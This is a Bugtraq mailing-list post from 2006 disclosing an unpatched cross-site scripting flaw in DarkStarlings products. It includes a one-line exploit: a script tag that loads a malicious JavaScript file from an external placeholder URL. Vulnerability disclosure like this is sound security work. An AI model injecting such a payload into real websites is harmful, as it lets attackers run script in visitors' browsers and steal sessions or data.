Bugtraq mailing list archives
DarkStarlings.com XSS Vulnerability
From: Will Boyce <mail () willboyce com>
Date: Mon, 6 Feb 2006 01:10:27 +0000
--------------------Summary---------------- Vendor: DarkStarlings Vendor's Web Site: http://www.darkstarlings.com/ Software: All products Versions: All versions Critical Level: Moderate Type: Cross-Site Scripting Class: Remote Status: Unpatched Exploit: Available Solution: Not Available Discovered by: Will Boyce (mail () willboyce com) -----------------Description--------------- Arbitrary script code insertion is possible in <script> tags <script> tag isn't properly sanitized. This can be used to post arbitrary script code. --------------Exploit---------------------- <script language="text/javascript" src="http://url/malicious.js"> --------------Solution--------------------- No Patch available. --------------Credit----------------------- Discovered by: Will Boyce (mail () willboyce com) -- Regards, Will Boyce. http://willboyce.com
Current thread:
- DarkStarlings.com XSS Vulnerability Will Boyce (Feb 06)
- <Possible follow-ups>
- Re: DarkStarlings.com XSS Vulnerability webmaster (Feb 26)